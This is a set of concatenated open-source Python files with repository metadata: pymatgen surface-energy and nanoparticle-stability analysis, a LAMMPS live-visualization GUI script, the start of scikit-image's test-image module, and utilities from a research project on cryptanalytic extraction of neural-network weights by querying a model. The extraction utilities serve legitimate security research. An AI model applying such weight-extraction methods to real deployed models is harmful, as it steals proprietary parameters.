        plt.annotate(r"$V^{interior}_{slab}=%.2f$" % (self.ave_bulk_p),
                     xy=xy, xytext=xy, color='r', fontsize=label_fontsize)

        # label the work function as a barrier
        plt.plot([label_in_vac] * 2, [self.efermi, self.vacuum_locpot],
                 'k--', zorder=-5, linewidth=2)
        xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]
        plt.annotate(r"$\Phi=%.2f$" % (self.work_function),
                     xy=xy, xytext=xy, fontsize=label_fontsize)

        return plt

    def is_converged(self, min_points_frac=0.015, tol=0.0025):
        """
        A well converged work function should have a flat electrostatic
        potential within some distance (min_point) about where the peak
        electrostatic potential is found along the c direction of the
        slab. This is dependent on the size of the slab.

        Args:
            min_points_frac (float): Fraction of the locpot data points,
                +/- the point where the electrostatic potential peaks
                along c, that must be flat.
            tol (float): If the electrostatic potential stays the same
                within this tolerance, within the min_points, it is converged.

        Returns a bool (whether or not the work function is converged)
        """
        # tolerance is relative to the total potential swing along c
        conv_within = tol * (max(self.locpot_along_c) - min(self.locpot_along_c))
        min_points = int(min_points_frac * len(self.locpot_along_c))
        peak_i = self.locpot_along_c.index(self.vacuum_locpot)
        all_flat = []
        for i in range(len(self.along_c)):
            if peak_i - min_points < i < peak_i + min_points:
                if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:
                    all_flat.append(False)
                else:
                    all_flat.append(True)
        return all(all_flat)

    @staticmethod
    def from_files(poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):
        """
        Builds a WorkFunctionAnalyzer from VASP output files.

        Args:
            poscar_filename: POSCAR file of the slab
            locpot_filename: LOCPOT file of the slab
            outcar_filename: OUTCAR file of the slab (for the Fermi energy)
            shift (float): passed through to the constructor
            blength (float (Ang)): passed through to the constructor

        Returns:
            WorkFunctionAnalyzer
        """
        p = Poscar.from_file(poscar_filename)
        l = Locpot.from_file(locpot_filename)
        o = Outcar(outcar_filename)
        return WorkFunctionAnalyzer(p.structure, l.get_average_along_axis(2),
                                    o.efermi, shift=shift, blength=blength)
class NanoscaleStability:
    """
    A class for analyzing the stability of nanoparticles of different
    polymorphs with respect to size. The Wulff shape will be the
    model for the nanoparticle. Stability will be determined by
    an energetic competition between the weighted surface energy
    (surface energy of the Wulff shape) and the bulk energy. A
    future release will include a 2D phase diagram (e.g. wrt size
    vs chempot for adsorbed or nonstoichiometric surfaces). Based
    on the following work:

        Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
        stabilization of sodium oxides: Implications for Na-O2
        batteries. Nano Letters, 14(2), 1016-1020.
        https://doi.org/10.1021/nl404557w

    .. attribute:: se_analyzers

        List of SurfaceEnergyPlotter objects. Each item corresponds to a
        different polymorph.

    .. attribute:: symprec

        See WulffShape.
    """

    def __init__(self, se_analyzers, symprec=1e-5):
        """
        Analyzes the nanoscale stability of different polymorphs.

        Args:
            se_analyzers (list): List of SurfaceEnergyPlotter objects,
                one per polymorph.
            symprec (float): Symmetry precision (see WulffShape).
        """
        self.se_analyzers = se_analyzers
        self.symprec = symprec

    def solve_equilibrium_point(self, analyzer1, analyzer2,
                                delu_dict=None, delu_default=0,
                                units="nanometers"):
        """
        Gives the radial size of two particles where equilibrium is reached
        between both particles. NOTE: the solution here is not the same
        as the solution visualized in the plot because solving for r
        requires that both the total surface area and volume of the
        particles are functions of r.

        Args:
            analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the
                first polymorph
            analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the
                second polymorph
            delu_dict (dict): Dictionary of the chemical potentials to be set as
                constant. Note the key should be a sympy Symbol object of the
                format: Symbol("delu_el") where el is the name of the element.
            delu_default (float): Default value for all unset chemical potentials
            units (str): Can be nanometers or Angstrom

        Returns:
            Particle radius in nm
        """
        # BUGFIX: the default used to be a shared mutable {}.
        delu_dict = {} if delu_dict is None else delu_dict

        # Set up
        wulff1 = analyzer1.wulff_from_chempot(delu_dict=delu_dict,
                                              delu_default=delu_default,
                                              symprec=self.symprec)
        wulff2 = analyzer2.wulff_from_chempot(delu_dict=delu_dict,
                                              delu_default=delu_default,
                                              symprec=self.symprec)

        # Now calculate r: the radius at which the surface-energy
        # difference balances the bulk-energy difference.
        delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy
        delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)
        r = (-3 * delta_gamma) / delta_E

        return r / 10 if units == "nanometers" else r

    def wulff_gform_and_r(self, wulffshape, bulk_entry, r, from_sphere_area=False,
                          r_units="nanometers", e_units="keV", normalize=False,
                          scale_per_atom=False):
        """
        Calculates the formation energy of the particle with arbitrary radius r.

        Args:
            wulffshape (WulffShape): Initial, unscaled WulffShape
            bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
            r (float (Ang)): Arbitrary effective radius of the WulffShape
            from_sphere_area (bool): There are two ways to calculate the bulk
                formation energy. Either by treating the volume and thus surface
                area of the particle as a perfect sphere, or as a Wulff shape.
            r_units (str): Can be nanometers or Angstrom
            e_units (str): Can be keV or eV
            normalize (bool): Whether or not to normalize energy by volume
            scale_per_atom (bool): Whether or not to normalize by number of
                atoms in the particle

        Returns:
            particle formation energy (float in keV), effective radius
        """
        # Set up
        miller_se_dict = wulffshape.miller_energy_dict
        new_wulff = self.scaled_wulff(wulffshape, r)
        new_wulff_area = new_wulff.miller_area_dict

        # calculate surface energy of the particle
        if not from_sphere_area:
            # By approximating the particle as a Wulff shape
            w_vol = new_wulff.volume
            tot_wulff_se = 0
            for hkl in new_wulff_area.keys():
                tot_wulff_se += miller_se_dict[hkl] * new_wulff_area[hkl]
            Ebulk = self.bulk_gform(bulk_entry) * w_vol
            new_r = new_wulff.effective_radius
        else:
            # By approximating the particle as a perfect sphere
            w_vol = (4 / 3) * np.pi * r ** 3
            sphere_sa = 4 * np.pi * r ** 2
            tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa
            Ebulk = self.bulk_gform(bulk_entry) * w_vol
            new_r = r

        new_r = new_r / 10 if r_units == "nanometers" else new_r
        e = Ebulk + tot_wulff_se
        e = e / 1000 if e_units == "keV" else e
        e = e / ((4 / 3) * np.pi * new_r ** 3) if normalize else e

        # number density of the bulk, used for the per-atom scaling
        bulk_struct = bulk_entry.structure
        density = len(bulk_struct) / bulk_struct.lattice.volume
        e = e / (density * w_vol) if scale_per_atom else e

        return e, new_r

    def bulk_gform(self, bulk_entry):
        """
        Returns the formation energy of the bulk: the entry's energy
        divided by its unit-cell volume.

        Args:
            bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
        """
        return bulk_entry.energy / bulk_entry.structure.lattice.volume

    def scaled_wulff(self, wulffshape, r):
        """
        Scales the Wulff shape with an effective radius r. Note that the resulting
        Wulff does not necessarily have the same effective radius as the one
        provided. The Wulff shape is scaled by its surface energies where first
        the surface energies are scaled by the minimum surface energy and then
        multiplied by the given effective radius.

        Args:
            wulffshape (WulffShape): Initial, unscaled WulffShape
            r (float): Arbitrary effective radius of the WulffShape

        Returns:
            WulffShape (scaled by r)
        """
        # get the scaling ratio for the energies
        r_ratio = r / wulffshape.effective_radius
        miller_list = wulffshape.miller_energy_dict.keys()
        # Normalize the magnitude of the facet normal vectors
        # of the Wulff shape by the minimum surface energy.
        se_list = np.array(list(wulffshape.miller_energy_dict.values()))
        # Scale the magnitudes by r_ratio
        scaled_se = se_list * r_ratio

        return WulffShape(wulffshape.lattice, miller_list,
                          scaled_se, symprec=self.symprec)

    def plot_one_stability_map(self, analyzer, max_r, delu_dict=None, label="",
                               increments=50, delu_default=0, plt=None,
                               from_sphere_area=False, e_units="keV",
                               r_units="nanometers", normalize=False,
                               scale_per_atom=False):
        """
        Returns the plot of the formation energy of a particle against its
        effective radius.

        Args:
            analyzer (SurfaceEnergyPlotter): Analyzer associated with the
                polymorph to plot
            max_r (float): The maximum radius of the particle to plot up to.
            delu_dict (dict): Dictionary of the chemical potentials to be set as
                constant. Note the key should be a sympy Symbol object of the
                format: Symbol("delu_el") where el is the name of the element.
            label (str): Label of the plot for legend
            increments (int): Number of plot points
            delu_default (float): Default value for all unset chemical potentials
            plt (pylab): Plot
            from_sphere_area (bool): There are two ways to calculate the bulk
                formation energy. Either by treating the volume and thus surface
                area of the particle as a perfect sphere, or as a Wulff shape.
            r_units (str): Can be nanometers or Angstrom
            e_units (str): Can be keV or eV
            normalize (bool): Whether or not to normalize energy by volume
            scale_per_atom (bool): Whether or not to normalize by number of
                atoms in the particle
        """
        plt = plt if plt else pretty_plot(width=8, height=7)

        wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict,
                                                 delu_default=delu_default,
                                                 symprec=self.symprec)

        gform_list, r_list = [], []
        # start just above zero to avoid a degenerate (zero-size) particle
        for r in np.linspace(1e-6, max_r, increments):
            gform, r = self.wulff_gform_and_r(wulffshape, analyzer.ucell_entry,
                                              r, from_sphere_area=from_sphere_area,
                                              r_units=r_units, e_units=e_units,
                                              normalize=normalize,
                                              scale_per_atom=scale_per_atom)
            gform_list.append(gform)
            r_list.append(r)

        # raw string avoids the invalid "\A" escape warning
        ru = "nm" if r_units == "nanometers" else r"\AA"
        plt.xlabel(r"Particle radius ($%s$)" % (ru))
        eu = "$%s/%s^3$" % (e_units, ru)
        plt.ylabel(r"$G_{form}$ (%s)" % (eu))

        plt.plot(r_list, gform_list, label=label)

        return plt

    def plot_all_stability_map(self, max_r, increments=50, delu_dict=None,
                               delu_default=0, plt=None, labels=None,
                               from_sphere_area=False, e_units="keV",
                               r_units="nanometers", normalize=False,
                               scale_per_atom=False):
        """
        Returns the plot of the formation energy of particles
        of different polymorphs against their effective radius.

        Args:
            max_r (float): The maximum radius of the particle to plot up to.
            increments (int): Number of plot points
            delu_dict (dict): Dictionary of the chemical potentials to be set as
                constant. Note the key should be a sympy Symbol object of the
                format: Symbol("delu_el") where el is the name of the element.
            delu_default (float): Default value for all unset chemical potentials
            plt (pylab): Plot
            labels (list): List of labels for each plot, corresponds to the
                list of se_analyzers
            from_sphere_area (bool): There are two ways to calculate the bulk
                formation energy. Either by treating the volume and thus surface
                area of the particle as a perfect sphere, or as a Wulff shape.
            e_units (str): Can be keV or eV
            r_units (str): Can be nanometers or Angstrom
            normalize (bool): Whether or not to normalize energy by volume
            scale_per_atom (bool): Whether or not to normalize by number of
                atoms in the particle
        """
        plt = plt if plt else pretty_plot(width=8, height=7)
        for i, analyzer in enumerate(self.se_analyzers):
            label = labels[i] if labels else ""
            plt = self.plot_one_stability_map(analyzer, max_r, delu_dict,
                                              label=label, plt=plt,
                                              increments=increments,
                                              delu_default=delu_default,
                                              from_sphere_area=from_sphere_area,
                                              e_units=e_units, r_units=r_units,
                                              normalize=normalize,
                                              scale_per_atom=scale_per_atom)
        return plt
# class GetChempotRange:
# def __init__(self, entry):
# self.entry = entry
#
#
# class SlabEntryGenerator:
# def __init__(self, entry):
# self.entry = entry
def sub_chempots(gamma_dict, chempots):
    """
    Uses a numpy dot product to substitute chemical potentials
    into the surface grand potential. This is much faster
    than using the subs function in sympy.

    Args:
        gamma_dict (dict): Surface grand potential equation
            as a coefficient dictionary
        chempots (dict): Dictionary assigning each chemical
            potential (key) in gamma a value

    Returns:
        Surface energy as a float
    """
    def _value(term):
        # Terms without an assigned chempot stay symbolic; the constant
        # term (key 1) always substitutes to 1.
        if term not in chempots:
            return term
        if term == 1:
            return 1
        return chempots[term]

    terms = list(gamma_dict)
    coeffs = [gamma_dict[t] for t in terms]
    values = [_value(t) for t in terms]
    return np.dot(coeffs, values)
|
montoyjh/pymatgen
|
pymatgen/analysis/surface_analysis.py
|
Python
|
mit
| 82,695
|
[
"VASP",
"pymatgen"
] |
2f20b231d36d65e1ed49a187d2f5d97f48e396c563b205f13f79999ec7f7b433
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import jax.numpy as jnp
import sys
from src.global_vars import *
from src.global_vars import __cheat_A, __cheat_B
def matmul(a, b, c, np=np):
    """Right-multiply a by b and add the bias c (treated as 0 when None).

    The np parameter lets callers substitute jax.numpy for numpy.
    """
    bias = np.zeros(1) if c is None else c
    return np.dot(a, b) + bias
def relu(x):
    """Elementwise ReLU: zero out the negative entries via a boolean mask."""
    positive = x > 0
    return x * positive
# Okay so this is an ugly hack
# I want to track where the queries come from.
# So in order to pretty print line number -> code
# open up the current file and use this as a lookup.
TRACK_LINES = False
# BUGFIX: use a context manager so the file handle is closed
# deterministically (open(...).readlines() leaked the handle).
with open(sys.argv[0]) as _self_file:
    self_lines = _self_file.readlines()

# We're going to keep track of all queries we've generated so that we can use them later on
# (in order to save on query efficiency)
# Format: [(x, f(x))]
SAVED_QUERIES = []
def run(x, inner_A=__cheat_A, inner_B=__cheat_B):
    """
    Run the neural network forward on the input x using the matrix A,B.
    Log the result as having happened so that we can debug errors and
    improve query efficiency.

    Args:
        x: 2-D batch of queries, one input per row (asserted below).
        inner_A: list of per-layer weight matrices.
        inner_B: list of per-layer bias vectors.

    Returns:
        The network's output for each row of x.
    """
    global query_count
    query_count += x.shape[0]
    assert len(x.shape) == 2
    orig_x = x
    for i, (a, b) in enumerate(zip(inner_A, inner_B)):
        # Compute the matrix product.
        # This is a right-matrix product which means that rows/columns are flipped
        # from the definitions in the paper.
        # This was the first method I wrote and it doesn't make sense.
        # Please forgive me.
        x = matmul(x, a, b)
        if i < len(sizes) - 2:
            # Hidden layers get a ReLU; the final layer stays linear.
            x = x * (x > 0)
    SAVED_QUERIES.extend(zip(orig_x, x))
    if TRACK_LINES:
        # BUGFIX: this module never imported traceback, so enabling
        # TRACK_LINES used to raise NameError; import it locally here.
        import traceback
        for line in traceback.format_stack():
            if 'repeated' in line:
                continue
            line_no = int(line.split("line ")[1].split()[0][:-1])
            if line_no not in query_count_at:
                query_count_at[line_no] = 0
            query_count_at[line_no] += x.shape[0]
    return x
class NoCheatingError(Exception):
    """
    This error is thrown by functions that cheat if we're in no-cheating mode.

    To debug code it's helpful to be able to look at the weights directly,
    and inspect the inner activations of the model.
    But sometimes debug code can be left in by accident and we might pollute
    the actual results of the paper by cheating. This error is thrown by all
    functions that cheat so that we can't possibly do it by accident.
    """
class AcceptableFailure(Exception):
    """
    Sometimes things fail for entirely acceptable reasons (e.g., we haven't
    queried enough points to have seen all the hyperplanes, or we get stuck
    in a constant zero region). When that happens we throw an AcceptableFailure
    because life is tough but we should just back out and try again after
    making the appropriate correction.

    Any keyword arguments are attached to the instance as attributes so a
    handler can recover partial results.
    """

    def __init__(self, *args, **kwargs):
        # Cooperative init: the original skipped Exception.__init__, which
        # only works because BaseException.__new__ happens to store args.
        super().__init__(*args)
        for key, value in kwargs.items():
            setattr(self, key, value)
class GatherMoreData(AcceptableFailure):
    """
    When gathering witnesses to hyperplanes, sometimes we don't have
    enough and need more witnesses to *this particular neuron*.
    This error says that we should gather more examples of that one.
    """

    def __init__(self, data, **kwargs):
        # Py3 zero-argument super(); the parent attaches data as an attribute.
        super().__init__(data=data, **kwargs)
def _cheat_get_inner_layers(x, A=__cheat_A, B=__cheat_B, as_list=False):
    """
    Cheat to get the inner layers of the neural network.
    Returns a copy of each layer's pre-activation values.
    """
    layer_values = []
    for depth, (weight, bias) in enumerate(zip(A, B)):
        x = matmul(x, weight, bias)
        layer_values.append(np.copy(x))
        if depth < len(sizes) - 2:
            # ReLU between hidden layers only.
            x = x * (x > 0)
    return layer_values
def cheat_get_inner_layers(x, A=A, B=B, as_list=False):
    """Guarded wrapper around _cheat_get_inner_layers."""
    if CHEATING:
        return _cheat_get_inner_layers(x, A, B, as_list)
    raise NoCheatingError()
def _cheat_get_polytope_id(x, A=__cheat_A, B=__cheat_B, as_list=False, flatten=True):
    """
    Cheat to get the polytope ID of the network.
    """
    if not CHEATING:
        raise NoCheatingError()
    signs = []
    for depth, (weight, bias) in enumerate(zip(A, B)):
        x = matmul(x, weight, bias)
        if depth < len(sizes) - 2:
            # Record which hidden units are inactive before the ReLU.
            signs.append(x < 0)
            x = x * (x > 0)
    if flatten:
        arr = np.array(np.concatenate(signs, axis=1), dtype=np.int64)
    else:
        arr = signs
    if as_list:
        return arr
    # Pack the per-neuron sign bits into a single integer per input row.
    arr *= 1 << np.arange(arr.shape[1])
    return np.sum(arr, axis=1)
def cheat_get_polytope_id(x, A=A, B=B, as_list=False, flatten=False):
    """Guarded wrapper around _cheat_get_polytope_id."""
    if CHEATING:
        return _cheat_get_polytope_id(x, A, B, as_list, flatten)
    raise NoCheatingError()
def cheat_num_relu_crosses(low, high):
    """
    Compute the number of relu crosses between low and high.
    This can be a lower bound if some relu goes from 0 to 1 and back to 0,
    the function here will return 0 for that relu.
    """
    if not CHEATING:
        raise NoCheatingError()
    signs_low = cheat_get_polytope_id(low, as_list=True, flatten=False)
    signs_high = cheat_get_polytope_id(high, as_list=True, flatten=False)
    # Per-layer count of neurons whose sign differs between the two points.
    return [np.sum(a != b) for a, b in zip(signs_low, signs_high)]
def basis(i, N=DIM):
    """
    Standard basis vector along dimension i: an N-vector of float64
    zeros with a single 1 at position i.
    """
    vec = np.zeros(N, dtype=np.float64)
    vec[i] = 1
    return vec
def which_is_zero(layer, values):
    """Index (along the last axis) of the entry of values[layer] closest to zero."""
    return np.argmin(np.abs(values[layer]), axis=-1)
def get_polytope_at(known_T, known_A, known_B, x, prior=True):
    """
    Get the polytope for an input using the known transform and known A.
    This function IS NOT CHEATING.

    Args:
        known_T (KnownT): transform for the already-extracted layers.
        known_A, known_B: weight matrix and bias of the next layer.
        x: a single input point (1-D; a batch axis is added below).
        prior (bool): prepend the polytope of the known layers.

    Returns:
        Tuple of sign values identifying the polytope.
    """
    if prior:
        which_polytope = known_T.get_polytope(x)
    else:
        which_polytope = tuple()
    # (Removed the unused LAYER = len(known_T.A)+1 local from the original.)
    hidden = known_T.forward(x[np.newaxis, :], with_relu=True)
    which_polytope += tuple(np.int32(np.sign(matmul(hidden, known_A, known_B)))[0])
    return which_polytope
def get_hidden_at(known_T, known_A, known_B, LAYER, x, prior=True):
    """
    Get the hidden value for an input using the known transform and known A.
    This function IS NOT CHEATING.

    NOTE(review): LAYER is unused but kept for interface compatibility.
    """
    if prior:
        activations = [value
                       for layer in known_T.get_hidden_layers(x)
                       for value in layer]
    else:
        activations = []
    hidden = known_T.forward(x[np.newaxis, :], with_relu=True)
    activations += list(matmul(hidden, known_A, known_B)[0])
    return tuple(activations)
class KnownT:
    """
    Holds the weight matrices A and bias vectors B recovered so far and
    evaluates the partial network they define.
    """

    def __init__(self, A, B):
        # A: list of weight matrices; B: list of bias vectors, one per layer.
        self.A = A
        self.B = B

    def extend_by(self, a, b):
        """Return a new KnownT with one more layer (a, b) appended."""
        return KnownT(self.A + [a], self.B + [b])

    def forward(self, x, with_relu=False, np=np):
        """Run x through the known layers. ReLU is applied between layers,
        and also after the final known layer when with_relu is True."""
        for i, (a, b) in enumerate(zip(self.A, self.B)):
            x = matmul(x, a, b, np)
            if (i < len(self.A) - 1) or with_relu:
                x = x * (x > 0)
        return x

    def forward_at(self, point, d_matrix):
        """Propagate d_matrix through the linear region containing point,
        masking each layer by the ReLUs that are active at point."""
        if len(self.A) == 0:
            return d_matrix

        mask_vectors = [layer > 0 for layer in self.get_hidden_layers(point)]

        h_matrix = np.array(d_matrix)
        for i, (matrix, mask) in enumerate(zip(self.A, mask_vectors)):
            h_matrix = matmul(h_matrix, matrix, None) * mask

        return h_matrix

    def get_hidden_layers(self, x, flat=False, np=np):
        """Return the pre-activation values of every known layer
        (concatenated into one vector when flat is True)."""
        if len(self.A) == 0:
            return []
        region = []
        for i, (a, b) in enumerate(zip(self.A, self.B)):
            x = matmul(x, a, b, np=np)
            # jax arrays are immutable, so no defensive copy is needed there.
            if np == jnp:
                region.append(x)
            else:
                region.append(np.copy(x))
            if i < len(self.A) - 1:
                x = x * (x > 0)
        if flat:
            region = np.concatenate(region, axis=0)
        return region

    def get_polytope(self, x):
        """Sign pattern of x's hidden units under the known layers."""
        if len(self.A) == 0:
            return tuple()
        h = self.get_hidden_layers(x)
        h = np.concatenate(h, axis=0)
        return tuple(np.int32(np.sign(h)))
def check_quality(layer_num, extracted_normal, extracted_bias, do_fix=False):
    """
    Compare an extracted weight matrix/bias against the true (cheating) weights.

    The first half is read-only: for each extracted neuron it reports which
    true neuron it maps onto and with what relative error.  When `do_fix` is
    True and CHEATING is enabled, the extracted weights are rescaled and
    permuted to align with the true network.

    Relies on module globals: neuron_count, __cheat_A, __cheat_B, CHEATING.
    """
    print("\nCheck the solution of the last weight matrix.")
    reorder = [None]*(neuron_count[layer_num+1])
    for i in range(neuron_count[layer_num+1]):
        gaps = []
        ratios = []
        for j in range(neuron_count[layer_num+1]):
            # Guard against dividing by a (near-)zero extracted column.
            # BUG FIX: the original wrote `np.all(np.abs(col)) < 1e-9`, which
            # compares a boolean to the threshold; the comparison belongs
            # inside np.all().
            if np.all(np.abs(extracted_normal[:,i]) < 1e-9):
                extracted_normal[:,i] += 1e-9
            # Best scalar mapping the extracted column onto the true column.
            ratio = __cheat_A[layer_num][:,j] / extracted_normal[:,i]
            ratio = np.median(ratio)
            # Relative squared error of the rescaled column.
            error = __cheat_A[layer_num][:,j] - ratio * extracted_normal[:,i]
            error = np.sum(error**2)/np.sum(__cheat_A[layer_num][:,j]**2)
            gaps.append(error)
            ratios.append(ratio)
        # Hoisted: the original recomputed np.argmin(gaps) repeatedly.
        best = np.argmin(gaps)
        print("Neuron", i, "maps on to neuron", best, "with error", np.min(gaps)**.5, 'ratio', ratios[best])
        print("Bias check", (__cheat_B[layer_num][best]-extracted_bias[i]*ratios[best]))
        reorder[best] = i
        if do_fix and CHEATING:
            extracted_normal[:,i] *= np.abs(ratios[best])
            extracted_bias[i] *= np.abs(ratios[best])
        if min(gaps) > 1e-2:
            print("ERROR LAYER EXTRACTED INCORRECTLY")
            print("\tGAPS:", " ".join("%.04f"%x for x in gaps))
            print("\t Got:", " ".join("%.04f"%x for x in extracted_normal[:,i]/extracted_normal[0,i]))
            print("\t Real:", " ".join("%.04f"%x for x in __cheat_A[layer_num][:,best]/__cheat_A[layer_num][0,best]))
    # Randomly assign the unused neurons.
    used = [x for x in reorder if x is not None]
    missed = list(set(range(len(reorder))) - set(used))
    for i in range(len(reorder)):
        if reorder[i] is None:
            reorder[i] = missed.pop()
    if CHEATING:
        extracted_normal = extracted_normal[:,reorder]
        extracted_bias = extracted_bias[reorder]
    return extracted_normal,extracted_bias
|
google-research/cryptanalytic-model-extraction
|
src/utils.py
|
Python
|
apache-2.0
| 10,441
|
[
"NEURON"
] |
7d14e2af515d69d68c282554dc4f863da6e56f228dd7ba554c15a742ccff2fb7
|
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# vizplotgui_gl.py
# Purpose: viz running LAMMPS simulation via GL tool with plot and GUI
# Syntax: vizplotgui_gl.py in.lammps Nfreq compute-ID
# in.lammps = LAMMPS input script
# Nfreq = plot data point and viz shapshot every this many steps
# compute-ID = ID of compute that calculates temperature
# (or any other scalar quantity)
from __future__ import print_function
import sys,time
sys.path.append("./pizza")
# methods called by GUI
def run():
  # GUI "Run" button callback: signal the main loop to start stepping.
  global runflag
  runflag = 1
def stop():
  # GUI "Stop" button callback: signal the main loop to pause.
  global runflag
  runflag = 0
def settemp(value):
  # Slider callback: re-read the slider widget directly
  # (the Tk-supplied `value` argument is intentionally unused).
  global temptarget
  temptarget = slider.get()
def quit():
  # GUI "Quit" button callback.  NOTE: shadows the builtin quit();
  # kept as-is because the Button(command=quit) binding uses this name.
  global breakflag
  breakflag = 1
# method called by timestep loop every Nfreq steps
# read dump snapshot and viz it, update plot with compute value
def update(ntimestep):
  # Read the next dump snapshot, render it, and append the newest compute
  # value to the time-series plot.  Uses globals d, g, gn, lmp, xaxis, yaxis.
  d.next()
  d.unscale()
  g.show(ntimestep)
  value = lmp.extract_compute(compute,0,0)
  xaxis.append(ntimestep)
  yaxis.append(value)
  gn.plot(xaxis,yaxis)
# parse command line
argv = sys.argv
if len(argv) != 4:
  print("Syntax: vizplotgui_gl.py in.lammps Nfreq compute-ID")
  sys.exit()
infile = sys.argv[1]
nfreq = int(sys.argv[2])
compute = sys.argv[3]
# single-process script: `me` mimics an MPI rank so only "proc 0" drives the GUI
me = 0
from lammps import lammps
lmp = lammps()
# run infile all at once
# assumed to have no run command in it
# dump a file in native LAMMPS dump format for Pizza.py dump tool
lmp.file(infile)
lmp.command("thermo %d" % nfreq)
lmp.command("dump python all atom %d tmp.dump" % nfreq)
# initial 0-step run to generate initial 1-point plot, dump file, and image
lmp.command("run 0 pre yes post no")
value = lmp.extract_compute(compute,0,0)
ntimestep = 0
xaxis = [ntimestep]
yaxis = [value]
# shared GUI state, mutated by the callbacks defined above
breakflag = 0
runflag = 0
temptarget = 1.0
# wrapper on GL window via Pizza.py gl tool
# just proc 0 handles reading of dump file and viz
if me == 0:
  try:
    from Tkinter import *
  except:
    from tkinter import *
  tkroot = Tk()
  tkroot.withdraw()
  from dump import dump
  from gl import gl
  d = dump("tmp.dump",0)
  g = gl(d)
  d.next()
  d.unscale()
  g.zoom(1)
  g.shift(0,0)
  g.rotate(0,270)
  g.q(10)
  g.box(1)
  g.show(ntimestep)
# display GUI with run/stop buttons and slider for temperature
if me == 0:
  try:
    from Tkinter import *
  except:
    from tkinter import *
  tkroot = Tk()
  tkroot.withdraw()
  root = Toplevel(tkroot)
  root.title("LAMMPS GUI")
  frame = Frame(root)
  Button(frame,text="Run",command=run).pack(side=LEFT)
  Button(frame,text="Stop",command=stop).pack(side=LEFT)
  slider = Scale(frame,from_=0.0,to=5.0,resolution=0.1,
                 orient=HORIZONTAL,label="Temperature")
  slider.bind('<ButtonRelease-1>',settemp)
  slider.set(temptarget)
  slider.pack(side=LEFT)
  Button(frame,text="Quit",command=quit).pack(side=RIGHT)
  frame.pack()
  tkroot.update()
# wrapper on GnuPlot via Pizza.py gnu tool
if me == 0:
  from gnu import gnu
  gn = gnu()
  gn.plot(xaxis,yaxis)
  gn.title(compute,"Timestep","Temperature")
# endless loop, checking status of GUI settings every Nfreq steps
# run with pre yes/no and post yes/no depending on go/stop status
# re-invoke fix langevin with new seed when temperature slider changes
# after re-invoke of fix langevin, run with pre yes
running = 0
temp = temptarget
seed = 12345
lmp.command("fix 2 all langevin %g %g 0.1 %d" % (temp,temp,seed))
# Main GUI-driven loop: poll Tk every Nfreq steps and run/pause/quit per the
# button flags; re-seed the thermostat when the temperature slider changes.
while 1:
  if me == 0: tkroot.update()
  if temp != temptarget:
    temp = temptarget
    seed += me+1
    # BUG FIX: the original re-issued the fix with the hard-coded seed 12345,
    # so the freshly incremented `seed` was never used; pass it explicitly.
    lmp.command("fix 2 all langevin %g %g 0.1 %d" % (temp,temp,seed))
    running = 0
  if runflag and running:
    lmp.command("run %d pre no post no" % nfreq)
    ntimestep += nfreq
    if me == 0: update(ntimestep)
  elif runflag and not running:
    # first run after a pause or a thermostat change: force re-initialization
    lmp.command("run %d pre yes post no" % nfreq)
    ntimestep += nfreq
    if me == 0: update(ntimestep)
  elif not runflag and running:
    # just stopped: let LAMMPS clean up its timestepping state
    lmp.command("run %d pre no post yes" % nfreq)
    ntimestep += nfreq
    if me == 0: update(ntimestep)
  if breakflag: break
  if runflag: running = 1
  else: running = 0
  time.sleep(0.01)
lmp.command("run 0 pre no post yes")
|
akohlmey/lammps
|
python/examples/vizplotgui_gl.py
|
Python
|
gpl-2.0
| 4,142
|
[
"LAMMPS"
] |
6083df8c0ac3ed6da4c80b104e65e172a829f82c082b80a0f1a11a24543adc7f
|
"""Standard test images.
For more images, see
- http://sipi.usc.edu/database/database.php
"""
import os as _os
from ..io import imread
from skimage import data_dir
__all__ = ['load',
'camera',
'lena',
'text',
'checkerboard',
'coins',
'moon',
'page',
'horse',
'clock',
'immunohistochemistry',
'chelsea',
'coffee']
def load(f):
    """Load an image file located in the data directory.

    Parameters
    ----------
    f : string
        File name.

    Returns
    -------
    img : ndarray
        Image loaded from skimage.data_dir.
    """
    return imread(_os.path.join(data_dir, f))
def camera():
    """Gray-level "camera" image.

    Often used for segmentation and denoising examples.

    Returns
    -------
    img : ndarray
        Grayscale image loaded from the data directory.
    """
    return load("camera.png")
def lena():
    """Colour "Lena" image.

    The standard, yet sometimes controversial Lena test image was
    scanned from the November 1972 edition of Playboy magazine. From
    an image processing perspective, this image is useful because it
    contains smooth, textured, shaded as well as detail areas.

    Returns
    -------
    img : ndarray
        Colour image loaded from the data directory.
    """
    return load("lena.png")
def text():
    """Gray-level "text" image used for corner detection.

    Notes
    -----
    This image was downloaded from Wikipedia
    <http://en.wikipedia.org/wiki/File:Corner.png>`__.

    No known copyright restrictions, released into the public domain.
    """
    return load("text.png")
def checkerboard():
    """Checkerboard image.

    Checkerboards are often used in image calibration, since the
    corner-points are easy to locate.  Because of the many parallel
    edges, they also visualise distortions particularly well.
    """
    # Note the on-disk file name differs from the function name.
    return load("chessboard_GRAY.png")
def coins():
    """Greek coins from Pompeii.

    This image shows several coins outlined against a gray background.
    It is especially useful in, e.g. segmentation tests, where
    individual objects need to be identified against a background.
    The background shares enough grey levels with the coins that a
    simple segmentation is not sufficient.

    Notes
    -----
    This image was downloaded from the
    `Brooklyn Museum Collection
    <http://www.brooklynmuseum.org/opencollection/archives/image/617/image>`__.

    No known copyright restrictions.
    """
    return load("coins.png")
def moon():
    """Surface of the moon.

